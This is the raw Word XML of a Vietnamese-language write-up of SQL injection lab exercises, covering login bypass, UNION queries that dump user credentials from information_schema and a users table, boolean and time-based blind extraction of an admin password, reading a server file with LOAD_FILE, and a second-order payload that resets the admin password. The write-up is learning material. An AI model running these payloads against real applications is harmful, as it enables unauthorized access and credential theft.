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DF" w:rsidRDefault="004F1FDF" w:rsidP="004F1FDF">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="004F1FDF">
        <w:t>SQL injection allowing login bypass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Lab này đơn giản nhất chỉ cần vượt qua đăng nhập đúng với tên gọi.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 xml:space="preserve">Login thì select vượt qua đăng nhập thì chỉ cần chèn điều kiện đúng là đủ rồi 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 xml:space="preserve">Sử dụng: username = </w:t>
      </w:r>
      <w:r w:rsidRPr="004F1FDF">
        <w:t>abcd' or 1=1 -- '</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> với password bất kỳ là đăng nhập được rồi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F1FDF" w:rsidRPr="004F1FDF" w:rsidRDefault="004F1FDF" w:rsidP="004F1FDF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vào trong thấy dòng chữ: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i_am_here!__get_me. Hơi nghi ngờ nên check các trang khác xem còn gì không sau đó mới submit. Và correct</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F1FDF" w:rsidRPr="004F1FDF" w:rsidRDefault="004F1FDF" w:rsidP="004F1FDF">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02860F05" wp14:editId="5BE19485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F" w:rsidRDefault="00666D0F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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F1FDF" w:rsidRDefault="004F1FDF" w:rsidP="004F1FDF">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="004F1FDF">
        <w:lastRenderedPageBreak/>
        <w:t>SQL injection allowing retrieval of hidden data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Lab này phần lý thuyết mô tả rằng lỗi khi trong select giúp select thêm được các dữ liệu khác.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Đầu tiên lướt qua 1 lượt web tất cả tính năng. Thử đăng nhập với abcd’ or 1=1 – ‘ xem liệu còn lỗi không thì không có gì đặc biệt cả.</w:t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Ra trang chính thử lỗi thêm dấu ‘ thì thu được kết quả. Khả năng là sqli ở đây</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F1FDF" w:rsidRDefault="004F1FDF" w:rsidP="004F1FDF">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50E1D0F9" wp14:editId="7BDC2B0C">
            <wp:extent cx="34004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Order by để tìm số cột thì đến 7 lại lỗi -&gt; select 6 cột</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F1FDF" w:rsidRDefault="004F1FDF" w:rsidP="001A736F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Union select 1,2,3,4,5,6 – ‘ để xác định vị trí thông tin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F1FDF" w:rsidRDefault="004F1FDF" w:rsidP="004F1FDF">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17872FE7" wp14:editId="3A2CF2B7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DF" w:rsidRDefault="004F1FDF" w:rsidP="004F1FDF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Đến đây thì select các bảng infomation_schema để lấy cấu trúc database</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00291B3C" w:rsidRDefault="00291B3C" w:rsidP="00FD3BB4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">VGA’ union </w:t>
      </w:r>
      <w:r w:rsidRPr="00291B3C">
        <w:t>select</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00291B3C">
        <w:t>1,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00291B3C">
        <w:t>2,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00291B3C">
        <w:t>SCHEMA_NAME,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00291B3C">
        <w:t>4,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00291B3C">
        <w:t>5,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00291B3C">
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> FROM information_schema.SCHEMATA – ‘ -&gt; lấy thông tin các schema</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00291B3C" w:rsidRDefault="00291B3C" w:rsidP="00FD3BB4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">VGA’ </w:t>
      </w:r>
      <w:r w:rsidRPr="00291B3C">
        <w:t>union</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00291B3C">
        <w:t>select</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00291B3C">
        <w:t>1,2,TABLE_NAME,4,5,6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00291B3C">
        <w:t>FROM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00291B3C">
        <w:t>information_schema.TABLES</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00291B3C">
        <w:t>WHERE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00291B3C">
        <w:t>TABLE_SCHEMA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00291B3C">
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00291B3C">
        <w:t>vstore</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">’ </w:t>
      </w:r>
      <w:r w:rsidRPr="00291B3C">
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ‘ -&gt; Lấy thông tin các bảng trong schema vstore </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD3BB4" w:rsidRDefault="00FD3BB4" w:rsidP="00FD3BB4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">VGA’ </w:t>
      </w:r>
      <w:r w:rsidRPr="00291B3C">
        <w:t>union</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00291B3C">
        <w:t>select</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1,2,COLUMN_NAME</w:t>
      </w:r>
      <w:r w:rsidRPr="00291B3C">
        <w:t>,4,5,6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00291B3C">
        <w:t>FROM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00291B3C">
        <w:t>information_schema.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">COLUMNS </w:t>
      </w:r>
      <w:r w:rsidRPr="00291B3C">
        <w:t>WHERE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00291B3C">
        <w:t>TABLE_SCHEMA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00291B3C">
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00291B3C">
        <w:t>vstore</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">’ AND TABLE_NAME = ‘users’ </w:t>
      </w:r>
      <w:r w:rsidRPr="00291B3C">
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ‘ -&gt; Lấy thông tin các cột của bảng users </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD3BB4" w:rsidRDefault="00FD3BB4" w:rsidP="00FD3BB4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">VGA’ </w:t>
      </w:r>
      <w:r w:rsidRPr="00291B3C">
        <w:t>union</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00291B3C">
        <w:t>select</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1,2,username,role,5,password </w:t>
      </w:r>
      <w:r w:rsidRPr="00291B3C">
        <w:t>FROM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> users – ‘ -&gt; Lấy thông tin các user trong bảng users</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD3BB4" w:rsidRDefault="00FD3BB4" w:rsidP="00FD3BB4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DA0CA4E" wp14:editId="31DFCC8B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B4" w:rsidRDefault="00FD3BB4" w:rsidP="00FD3BB4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Submit password -&gt; correct</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D87AE6" w:rsidRDefault="00D87AE6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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD3BB4" w:rsidRDefault="00FD3BB4" w:rsidP="00FD3BB4">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00FD3BB4">
        <w:lastRenderedPageBreak/>
        <w:t>SQL injection, determining the number of columns returned by the query</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A04AA0" w:rsidRDefault="00A04AA0" w:rsidP="00A04AA0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Làm tương tự như bài trên thì inject vào luôn url để tìm số cột</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A04AA0" w:rsidRDefault="00A04AA0" w:rsidP="00A04AA0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Sử dụng:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A04AA0" w:rsidRDefault="00A04AA0" w:rsidP="00A04AA0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Type= RAM’ UNION SELECT 1, 2, COUNT(COLUMNS_NAME), 4, 5, 6 FROM information_schema.COLUMNS WHERE TABLE_NAME = ‘items’ -- ‘</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E062A5" w:rsidRDefault="00A04AA0" w:rsidP="00A04AA0">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="625B7723" wp14:editId="3055F9F7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2A5">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0062149A" w:rsidRDefault="00E062A5" w:rsidP="0062149A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00E062A5">
        <w:lastRenderedPageBreak/>
        <w:t>Blind SQL injection with conditional responses</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008048C4" w:rsidRDefault="008048C4" w:rsidP="0062149A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Truyền ‘ vào username check lỗi thì thấy.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008048C4" w:rsidRDefault="008048C4" w:rsidP="008048C4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F8BEB4C" wp14:editId="4441B39E">
            <wp:extent cx="5943600" cy="3578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C4" w:rsidRDefault="008048C4" w:rsidP="008048C4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Lỗi nằm ở username. Sau đó sử dụng quocnm3’ or 1=1 – ‘ vào được trang web -&gt; inject vào vị trí này</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008048C4" w:rsidRDefault="008048C4" w:rsidP="008048C4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Sử dụng substring để lấy từng ký tự trong password. Brute force các ký tự từ 0-&gt;9, a-&gt;z, tham số nào trả về 302 thì tìm được ký tự ở vị trí đó.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0056740C" w:rsidRDefault="0056740C" w:rsidP="0056740C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Username: Abcd’ OR (SUBSTRING(Password, 1,1) = ‘a’ AND role = ‘admin’) – ‘</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0056740C" w:rsidRDefault="0056740C" w:rsidP="0056740C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Password: abcd </w:t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>Sau khi brute force thì thu được 40 req 302.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0056740C" w:rsidRDefault="0056740C" w:rsidP="008048C4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nối các ký tự lại với nhau và test lại 1 lần để chắc chắn đúng. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008048C4" w:rsidRDefault="00B8206F" w:rsidP="008048C4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B8206F" w:rsidRDefault="00B8206F" w:rsidP="00B8206F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00B8206F">
        <w:lastRenderedPageBreak/>
        <w:t>Blind SQL injection with time delays</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008048C4" w:rsidRPr="008048C4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Quét qua cả trang web không thấy có gì đặc biệt. Thấy có chức năng mua hàng truyền lên item_id. Inject vào vị trí đó -&gt; thấy bị lọc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008048C4" w:rsidRPr="008048C4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Dùng 2 ngày để tìm cách by pass qua filter nhưng không được</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008048C4" w:rsidRPr="008048C4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Sau đó được hint ở cookie có biến lạ.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00926F35" w:rsidRPr="00926F35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Inject vào vị trí cookie thì thấy request trả về lâu hơn -&gt; Xác định vị trí inject</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007332B0" w:rsidRPr="007332B0" w:rsidRDefault="00926F35" w:rsidP="007332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Sử dụng SQLi tối ưu tấn công thử xem như nào. Thì với mỗi ký tự trong password AND nó với 128, 64, ... tương ứng với vị trí các bit 1 ở các vị trí 7, 6, 5, 4, ....</w:t>
      </w:r>
      <w:r w:rsidR="007332B0">
        <w:t xml:space="preserve"> và so sánh với chính 128, 64.</w:t>
      </w:r>
      <w:r w:rsidR="007332B0">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="007332B0" w:rsidRPr="007332B0" w:rsidRDefault="007332B0" w:rsidP="007332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Truy vấn: 1 – IF( (ASCII( SUBSTRING( SELECT Passsword FROM users WHERE role = ‘admin’ ), 1,1 ) &amp; 128 = 128 ), sleep(1), 0 )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008048C4" w:rsidRPr="007332B0" w:rsidRDefault="007332B0" w:rsidP="007332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 xml:space="preserve">Nếu trường hợp request chậm hơn-&gt; </w:t>
      </w:r>
      <w:r w:rsidR="008048C4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>bit tại vị trí x là 1. Còn không chậm hơn thì là 0. Làm lần lượt các 8 bit. -&gt; ra được dãy bit tương ứng với ký tự tại vị trí đó.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008048C4" w:rsidRPr="008048C4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Sử dụng turbo bắt request để lấy lọc các request chậm hơn bình thường</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007332B0" w:rsidRPr="007332B0" w:rsidRDefault="008048C4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Sau đó viết đoạn code để xử lý dữ liệu sau khi có được thì thu được password admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B8206F" w:rsidRPr="008048C4" w:rsidRDefault="007332B0" w:rsidP="00804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t>Test lại một lần cho chắc chắn password đúng. Và submit.</w:t>
      </w:r>
      <w:r w:rsidR="00B8206F">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C798A" w:rsidRDefault="00B8206F" w:rsidP="008B5447">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00B8206F">
        <w:lastRenderedPageBreak/>
        <w:t>SQL injection with out-of-band interaction</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C798A" w:rsidRDefault="001C798A" w:rsidP="001C798A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Bài có vẻ phức tạp khi phải đọc file trên máy chủ.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C798A" w:rsidRDefault="001C798A" w:rsidP="001C798A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tìm kiếm thì có cách đọc file với func của SQL tương ứng với các CSDL khác nhau. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F02D9C" w:rsidRDefault="001C798A" w:rsidP="00F02D9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Check </w:t>
      </w:r>
      <w:r w:rsidRPr="001C798A">
        <w:t>CURRENT_USER()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> thì được user root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F02D9C" w:rsidRDefault="00F02D9C" w:rsidP="00F02D9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="378689FC" wp14:editId="068D922C">
            <wp:extent cx="5943600" cy="2701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8A" w:rsidRDefault="001C798A" w:rsidP="001C798A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Đọc sách tiếp thì thấy phải có Role FILE và được is_granable bằng YES thì mới có quyền thực thi.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F02D9C" w:rsidRDefault="00F02D9C" w:rsidP="00EF3CBC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Truy vấn: </w:t>
      </w:r>
      <w:r w:rsidR="009613C5">
        <w:t xml:space="preserve">VGA’  </w:t>
      </w:r>
      <w:r w:rsidRPr="00F02D9C">
        <w:t>union</w:t>
      </w:r>
      <w:r w:rsidR="009613C5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F02D9C">
        <w:t>select</w:t>
      </w:r>
      <w:r w:rsidR="009613C5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F02D9C">
        <w:t>1,</w:t>
      </w:r>
      <w:r w:rsidR="009613C5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009613C5" w:rsidRPr="00F02D9C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F02D9C">
        <w:t>2,</w:t>
      </w:r>
      <w:r w:rsidR="009613C5">
        <w:t xml:space="preserve"> grantee,</w:t>
      </w:r>
      <w:r w:rsidR="009613C5" w:rsidRPr="00F02D9C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009613C5">
        <w:t xml:space="preserve">privilege_type </w:t>
      </w:r>
      <w:r w:rsidRPr="00F02D9C">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="009613C5">
        <w:t xml:space="preserve"> 5 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F02D9C">
        <w:t>,is_grantable</w:t>
      </w:r>
      <w:r w:rsidR="009613C5">
        <w:t xml:space="preserve"> FROM </w:t>
      </w:r>
      <w:r w:rsidRPr="00F02D9C">
        <w:t>inf</w:t>
      </w:r>
      <w:r w:rsidR="009613C5">
        <w:t>ormation_schema.user_privileges – ‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E9006D3" wp14:editId="3E5E257E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8A" w:rsidRDefault="001C798A" w:rsidP="001C798A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Truy vấn trên url check quyền. Thấy quyền Oke</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E8417A" w:rsidRDefault="001C798A" w:rsidP="00F73B1E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Truy vấn tiếp secure_file_priv để tìm folder có quyền đọc FILE thì thấy trả về trắng-&gt; disable secure_file_priv rồi.</w:t>
      </w:r>
      <w:r w:rsidR="00E378BF">
        <w:t xml:space="preserve"> Truy vấn </w:t>
      </w:r>
      <w:r w:rsidR="00E378BF" w:rsidRPr="00E378BF">
        <w:t>VGA</w:t>
      </w:r>
      <w:r w:rsidR="00E378BF">
        <w:t xml:space="preserve">’  union </w:t>
      </w:r>
      <w:r w:rsidR="00E378BF" w:rsidRPr="00E378BF">
        <w:t>select</w:t>
      </w:r>
      <w:r w:rsidR="00E378BF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E378BF" w:rsidRPr="00E378BF">
        <w:t>1,</w:t>
      </w:r>
      <w:r w:rsidR="00E378BF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E378BF" w:rsidRPr="00E378BF">
        <w:t xml:space="preserve"> 2,@@secure_file_priv,</w:t>
      </w:r>
      <w:r w:rsidR="00E378BF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E378BF" w:rsidRPr="00E378BF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E378BF">
        <w:t xml:space="preserve">4,5,6 – ‘ </w:t>
      </w:r>
      <w:r w:rsidR="00E8417A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="431CAE35" wp14:editId="6717ECC6">
            <wp:extent cx="5943600" cy="2723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8A" w:rsidRDefault="001C798A" w:rsidP="001C798A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Mọi rào cản đã không còn, thì ta tiến tới LOAD_FILE(‘/.passwd’) thôi :v </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0050495A" w:rsidRDefault="0050495A" w:rsidP="0050495A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D1746AE" wp14:editId="2B08E48E">
            <wp:extent cx="5943600" cy="2715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06F" w:rsidRPr="008B5447" w:rsidRDefault="001C798A" w:rsidP="001C798A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Đọc file và lấy đượ</w:t>
      </w:r>
      <w:r w:rsidR="004930D4">
        <w:t>c flag. Submit và correct.</w:t>
      </w:r>
      <w:r w:rsidR="00B8206F">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D2D06" w:rsidRDefault="004A09E2" w:rsidP="00B8206F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="004A09E2">
        <w:lastRenderedPageBreak/>
        <w:t>Second-order SQL Injection allowing get data</w:t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 xml:space="preserve">Bài này test qua các trang không có lỗi gì cả. Đặc biệt có chức năng register và chức năng đổi mật khẩu. </w:t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 xml:space="preserve">Xem lại lý thuyết thì thấy có ảnh này khá đặc biệt </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D2D06" w:rsidRDefault="000D2D06" w:rsidP="000D2D06">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D709458" wp14:editId="2D0D7B56">
            <wp:extent cx="59436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>Làm theo các bước này thì có tạo tài khoản</w:t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>Tạo một tài khoản với thông tin chứa sqli</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D2D06" w:rsidRDefault="000D2D06" w:rsidP="000D2D06">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Username: abcdasd’ update user set password=’sha1(abcd)’ WHERE role = ‘admin’</w:t>
      </w:r>
    </w:p>
